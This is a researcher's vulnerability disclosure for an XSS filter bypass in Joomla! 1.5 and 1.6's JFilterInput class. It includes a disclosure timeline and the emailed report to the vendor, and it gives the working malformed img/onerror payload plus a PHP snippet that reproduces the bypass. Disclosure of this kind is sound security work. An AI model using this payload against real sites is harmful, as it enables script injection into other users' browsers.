Joomla! 1.5 and 1.6 rely on the JFilterInput class to sanitize user-supplied html. This class attempts to parse any given string for html code, checks the code against a whitelist of elements and attributes, and strips out any code that is not allowed. However, malformed html code can be used to bypass the filter and inject XSS code into user-supplied input.
The following string bypasses JFilterInput's "safe" attributes in both 1.5 and 1.6:
<img src="<img src=x"/onerror=alert(1)//">
Users of 1.6 can test this by enabling the "Profile" user plugin and injecting this string into the "About Me" textarea. Joomla! 1.5 has no known core extensions that allow guests or regular users to post html, however any 3rd party extension that relies on this class to sanitize input will be vulnerable.
- Vulnerabilities Discovered: 15 January 2011
- Vendor Notified: 15 January 2011
- Vendor Response: 17 January 2011
- Update Available: ...
- Disclosure: 1 February 2011
Since posting this, I've decided to go ahead and publish the email exchange... in all it's brevity. Some headers removed.
-------- Original Message -------- Return-path: <firstname.lastname@example.org> Envelope-to: email@example.com Delivery-date: Mon, 17 Jan 2011 19:40:17 -0600 Date: Tue, 18 Jan 2011 01:40:26 +0000 Subject: Re: [#XNT-28157-847] JFilterInput XSS Bypass From: Joomla! Security Strike Team (JSST) <firstname.lastname@example.org> To: email@example.com Thank you for your email regarding a new vulnerability. We will investigate this as quickly as we can to verify and confirm the details. Once this is completed we will evaluate the complexity and criticality to determine the necessary resources and timing to correct the issue. Please note: We may contact you for additional details, and/or advise you of the outcome of our investigation. If this ticket XNT-28157-847 is not replied to within 7 days of Tue, 18 Jan 2011 01:40:20 +0000, it will be automatically closed. On Sat, 15 Jan 2011 19:38:20 +0000, jeff<firstname.lastname@example.org> wrote: > The following string bypasses JFilterInput's "safe" attributes in both > 1.5 and 1.6: > > <img src="<img src=x"/onerror=alert(1)//"> > > Here's a quick way to reproduce: append the following somewhere in the > template: > > <?php > $test = '<img src="x"/onerror=alert(1)//>'; // will be sanitized > $test .= '<img src="<img src=x"/onerror=alert(2)//">'; // will not be > sanitized > $filter =& JFilterInput::getInstance(null, null, 1, 1); > echo $filter->clean($test); > ?> > > The impact of this could be pretty wide, as any extension using this > method to sanitize user input is potentially vulnerable. One such > example is in 1.6 plg_user_profile "About Me" field. > > TinyMCE will neuter this bypass if attempted in its html source editor > or by disabling via the ui button, but this is not a good remedy.
It was well over 7 days, so I guess I'm a jackass for assuming the ticket was closed?